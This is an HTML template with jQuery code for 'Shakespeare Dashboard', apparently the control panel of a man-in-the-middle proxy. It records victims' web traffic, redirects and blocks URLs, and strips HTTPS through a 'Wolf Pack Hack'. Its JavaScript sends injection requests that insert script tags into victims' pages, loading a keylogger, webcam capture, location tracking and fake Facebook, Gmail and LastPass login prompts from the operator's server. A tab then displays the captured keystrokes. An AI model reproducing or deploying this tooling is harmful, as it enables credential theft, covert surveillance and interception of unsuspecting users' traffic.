{{set . "title" "Home"}}
{{template "header.html" .}}

<header class="row">
  <h1 class="col-md-4">Shakespeare Dashboard</h1>
  <h4 class="col-md-8 attackType">none selected</h4>
  <p></p>
</header>
<div class="main row">
  <section class="col-md-4 proxy-controls">
    <div class="panel panel-default">
      <!-- Default panel contents -->
      <div class="panel-heading">
        <h5>Proxy Controls</h5>
      </div>

      <!-- List group -->
      <ul class="list-group">
        <li class="list-group-item">
          <!-- <div class="onoffswitch">
            <input type="checkbox" name="startSimpleProxy" class="onoffswitch-checkbox" id="startSimpleProxy">
            <label class="onoffswitch-label" for="startSimpleProxy">
              <span class="onoffswitch-inner"></span>
              <span class="onoffswitch-switch"></span>
            </label>
          </div> -->
          <h4>Simple Proxy</h4>
          <small>Allows all connections through however data will be stored as a HAR file</small>
        </li>

        <!-- <li class="list-group-item">
          <div class="onoffswitch">
            <input type="checkbox" name="replaceImages" class="onoffswitch-checkbox" id="replaceImages" disabled="true">
            <label class="onoffswitch-label" for="replaceImages">
              <span class="onoffswitch-inner"></span>
              <span class="onoffswitch-switch"></span>
            </label>
          </div>
          <h4><s>Replace All Images</s></h4>
          <small>Replace the images on the page - disabled currently</small>
        </li> -->
        <!-- <li class="list-group-item">
          <div class="onoffswitch">
            <input type="checkbox" name="flipImages" class="onoffswitch-checkbox" id="flipImages" disabled="true">
            <label class="onoffswitch-label" for="flipImages">
              <span class="onoffswitch-inner"></span>
              <span class="onoffswitch-switch"></span>
            </label>
          </div>
          <h4><s>Flip Images</s></h4>
          <small>Flip the images on the page 180 degrees - disabled currently</small>
        </li> -->
        <li class="list-group-item">
          <div class="onoffswitch">
            <input type="checkbox" name="triggerRedirects" class="onoffswitch-checkbox" id="triggerRedirects">
            <label class="onoffswitch-label" for="triggerRedirects">
              <span class="onoffswitch-inner"></span>
              <span class="onoffswitch-switch"></span>
            </label>
          </div>
          <h4>Redirect URLs</h4>
          <small>If url is in whitelist (currently hardcoded), the client will be redirected to local page of same name. This cant handle HTTPS/HSTS</small>
        </li>

        <li class="list-group-item">
          <div class="onoffswitch">
            <input type="checkbox" name="triggerBlocks" class="onoffswitch-checkbox" id="triggerBlocks">
            <label class="onoffswitch-label" for="triggerBlocks">
              <span class="onoffswitch-inner"></span>
              <span class="onoffswitch-switch"></span>
            </label>
          </div>
          <h4>Block URLs</h4>
          <small>If url is in whitelist (currently hardcoded), the client will be blocked. This cant handle HTTPS/HSTS</small>
        </li>
        <!-- <li class="list-group-item list-group-item-toggle dropdown-toggle" aria-expanded="false">
          <a data-toggle="collapse" href="#collapseInject" aria-expanded="true" data-toggle="dropdown" aria-controls="collapseInject"><h4>Inject Hook in HTTP <span class="caret"></span></h4>
          <small>Array of scripts that can be injected into the clients page</small>
          </a>
          <ul class="list-group collapse" id="collapseInject">

            <li class="list-group-item" title="This will inject a keylogger into the page if it can (i.e HTTP).">
              <div class="onoffswitch">
                <input type="checkbox" name="keylogger" class="onoffswitch-checkbox" id="keylogger">
                <label class="onoffswitch-label" for="keylogger">
                  <span class="onoffswitch-inner"></span>
                  <span class="onoffswitch-switch"></span>
                </label>
              </div>
              <h4>Keylogger</h4>
              <small>Inject a keylogger into the page.</small>
            </li>

            <li class="list-group-item">
              <div class="onoffswitch">
                <input type="checkbox" name="takePhoto" class="onoffswitch-checkbox" id="takePhoto">
                <label class="onoffswitch-label" for="takePhoto">
                  <span class="onoffswitch-inner"></span>
                  <span class="onoffswitch-switch"></span>
                </label>
              </div>
              <h4>Take Photo</h4>
              <small>Attempt to take a photo with the web cam on the clients computer</small>
            </li>

            <li class="list-group-item">
              <div class="onoffswitch">
                <input type="checkbox" name="getLocation" class="onoffswitch-checkbox" id="getLocation">
                <label class="onoffswitch-label" for="getLocation">
                  <span class="onoffswitch-inner"></span>
                  <span class="onoffswitch-switch"></span>
                </label>
              </div>
              <h4>Get Location</h4>
              <small>Attempt to get the user's location</small>
            </li>

            <li class="list-group-item">
              <div class="onoffswitch">
                <input type="checkbox" name="requestLogin" class="onoffswitch-checkbox" id="requestLogin">
                <label class="onoffswitch-label" for="requestLogin">
                  <span class="onoffswitch-inner"></span>
                  <span class="onoffswitch-switch"></span>
                </label>
              </div>
              <h4>Request User Login</h4>
              <small>Request user Login to facebook, gmail or hotmail/outlook</small>
            </li>
           <li class="list-group-item">
            <div class="onoffswitch">
              <input type="checkbox" name="requestLastpass" class="onoffswitch-checkbox" id="requestLastpass">
              <label class="onoffswitch-label" for="requestLastpass">
                <span class="onoffswitch-inner"></span>
                <span class="onoffswitch-switch"></span>
              </label>
            </div>
            <h4>Request Lastpass Login</h4>
            <small>Pop up a lastpass login on the user's screen</small>
          </li>
          </ul>-->

        <li class="list-group-item">
        <div class="onoffswitch">
            <input type="checkbox" name="triggerWolfPack" class="onoffswitch-checkbox" id="triggerWolfPack">
            <label class="onoffswitch-label" for="triggerWolfPack">
              <span class="onoffswitch-inner"></span>
              <span class="onoffswitch-switch"></span>
            </label>
          </div>
          <h4>Wolf Pack Hack</h4>
          <small>Blocks pages that redirect to HTTPS and makes the connection itself. It then responds to the client with the server response over HTTP</small>
        </li>
      </ul>
    </div>
  </section>
  <section class="col-md-8 dashboard">

  <div role="tabpanel">

      <!-- Nav tabs -->
      <ul class="nav nav-tabs" role="tablist">
        <li role="presentation"><a href="#SelectUser" aria-controls="SelectUser" role="tab" data-toggle="tab">Select User</a></li>
        <li role="presentation" class="active"><a href="#hars" aria-controls="hars" role="tab" data-toggle="tab">Har Viewer</a></li>
        <li role="presentation"><a href="#logs" aria-controls="logs" role="tab" data-toggle="tab">Key Logs</a></li>
        <li role="presentation"><a href="#wifiRequests" aria-controls="wifiRequests" role="tab" data-toggle="tab"><s>Discover Local WiFi Requests</s></a></li>
        <li role="presentation"><a href="#CreateAP" aria-controls="CreateAP" role="tab" data-toggle="tab"><s>Create Access Points</s></a></li>
      </ul>

      <!-- Tab panes -->
      <div class="tab-content">

        <div role="tabpanel" class="tab-pane active" id="hars">
          <nav>
            <div class="btn-group">
              <button class="btn btn-info" id="gethars">Refresh Hars</button>
              <div class="btn-group harList">
                <button type="button" class="btn btn-default dropdown-toggle" data-toggle="dropdown" aria-expanded="false">
                  Select Har to Display <span class="caret"></span>
                </button>
                <ul class="dropdown-menu" role="menu" id="clients">
                  <li><a href="#">None, yet. Please Refresh Hars</a></li>
                </ul>
              </div>
            </div>
            <button class="btn btn-danger" id="deletehars">Delete current data</button>
            <!-- dropdown button -->
          </nav>

          <div id='har-view'></div> <!-- har viewer here -->
        </div>

        <div role="tabpanel" class="tab-pane" id="logs">
          <div id='userLogs'></div>
        </div>
        <div role="tabpanel" class="tab-pane" id="wifiRequests">
          <p>This is to discover the SSIDs that devices are trying to connect to. Useful for creating hotspots for targetted attacks</p>
          <div id='wifi-requests'></div>
        </div>
        <div role="tabpanel" class="tab-pane" id="CreateAP">
          <input type="text" class=".input-prepend" title="name for the wifi access point" placeholder="access point name">
        </div>
        <div role="tabpanel" class="tab-pane" id="SelectUser">
          <ul>
            <li>Select user here and it will be updated above</li>
          <ul>
        </div>
      </div>

    </div>

  </section>
</div>
<script type="text/javascript">

  $("#startSimpleProxy").click( function () {
    $.get( "/StartSimpleProxy", function ( data ) { console.log('StartSimpleProxy: ', data); } );
  });
  $("#triggerRedirects").click( function () {
    $.get( "/TriggerRedirects", function ( data ) { console.log('Redirect: ', data); } );
  });
  $("#triggerBlocks").click( function () {
    $.get( "/TriggerBlocks", function ( data ) { console.log('Blocking: ', data); } );
  });
  $("#triggerWolfPack").click( function () {
    $.get( "/TriggerWolfPack", function ( data ) { console.log('Wolf-pack: ', data); } );
  });







  $(".toplevel").click( function () {
    $(".btn").removeClass("btn-success");
    $(this).addClass("btn-success");
  });
  
  $("#deletehars").click(function() {
     $.get( "/App/DeleteHars", function ( data ) {
      $.each(data, function (i, d) {
        var descr = d.split("_", -1)
        console.log(descr)
        $("#clients").append('<button class="btn btn-default" id="passthrough">'+descr[1]+' : ' + descr[2]+'</button>')
      })
    });
  })
  $("#intercept").click(function() {
    $.get( "/InterceptHTTPS", function( data ) {
    });
  })
  $("#flipImages").click(function() {
    // alert("flipping images currently disabled")
    // $.get( "/FlipImages", function( data ) {
    //   $(".attackType").html("Flip Images")
    // });
  })
  $("#replaceImages").click(function() {
    // alert("Replacing images currently disabled")
    // $.get( "/FlipImages", function( data ) {
    //   $(".attackType").html("Flip Images")
    // });
  })
  // $("#redirect").click(function() {
  //   $.get( "/RedirectPage", function( data ) {
  //   });
  // })
  // $("#block").click(function() {
  //   $.get( "/BlockWebsites", function( data ) {
  //   });
  // })
  $("#keylogger").click(function() {
    $.get( "/InjectScript?replace=</body>&result=%3Cscript%20src%3D%22http://127.0.0.1:9000/public/InjectionScripts%2Fkeylogger.js%22%3E%3C%2Fscript%3E</body>", function( data ) {
    });
  })
 $("#getLocation").click(function() {
    $.get( "/InjectScript?replace=</body>&result=%3Cscript%20src%3D%22http://127.0.0.1:9000/public/InjectionScripts%2FgetLocation.js%22%3E%3C%2Fscript%3E</body>", function( data ) {
    });
  })
 $("#takePhoto").click(function() {
    $.get( "/InjectScript?replace=</body>&result=%3Cscript%20src%3D%22http://127.0.0.1:9000/public/InjectionScripts%2FtakePhoto.js%22%3E%3C%2Fscript%3E</body>", function( data ) {
    });
  })
   $("#requestLogin").click(function() {
    $.get( "/InjectScript?replace=</body>&result=%3Cscript%20src%3D%22http://127.0.0.1:9000/public/InjectionScripts%2Flogin.js%22%3E%3C%2Fscript%3E</body>", function( data ) {
    });
  })
   $("#requestLastpass").click(function() {
    $.get( "/InjectScript?replace=</body>&result=%3Cscript%20src%3D%22http://127.0.0.1:9000/public/InjectionScripts%2FlastpassInjection.js%22%3E%3C%2Fscript%3E</body>", function( data ) {
    });
  })
  $("#getKeyLogs").click(function() {
    $('#userLogs').html("")//clear
      $.get("/App/GetKeylogs", function ( data ) {
        var lastURL = data[0].Page
        $('#userLogs').append(lastURL+"<p>")
        $.each(data, function(i, j) {
          if ( j.Page === lastURL ) {
            $('#userLogs').append(j.Content)
          } else {
            $('#userLogs').append("<p>"+j.Page)
            $('#userLogs').append(j.Content)
          }
          lastURL = j.Page
        })

      })

  })
  //get the hars that have been collected
  //update for each connected client
  $("#gethars").click(function() {
    $("#clients").html("")
    $.getJSON("/App/GetHars", function( data ) {
    $(".attackType").html("Injected - Get Har Files")
    $.each(data, function(i, j) {
      var descr = j.split("_", -1)
      var listItem = $('<li><a href="#" id="'+j+'">'+descr[1]+' : ' + descr[2]+'</a></li>').click(function() {
        $.getJSON( "/public/hars/"+j, function( data ) {
            initHarView();
            har.render(data);
        });
      })
      $("#clients").append(listItem)
    })
  })
  })

  // bootstrap for toggle insted of click as above
  $(function () {
    $('.onoffswitch :checkbox').change(function() {
        // checked true or false, id of toggle
        console.log(this.checked, this.id);

        // switch by id, then check if checked is true
        switch(this.id) {
            case "takePhoto":
                console.log(this.checked, "taking the photo");
                if(this.checked){
                  // inject!
                } else {
                  // deject
                }
                break;
            default:
                console.log("toggled option that doesn't exist.")
        }

    });
  });

var har;
function initHarView(){
   $('#har-view').data('HarView', null);
   $('#hars-discovered').empty()
   $('#har-view').html('');
   $('#har-view').HarView();
   har = $('#har-view').data('HarView');

}
//get the latest hars that are available
$(document).ready(function() {
  initHarView();
})

</script>

{{template "footer.html" .}}
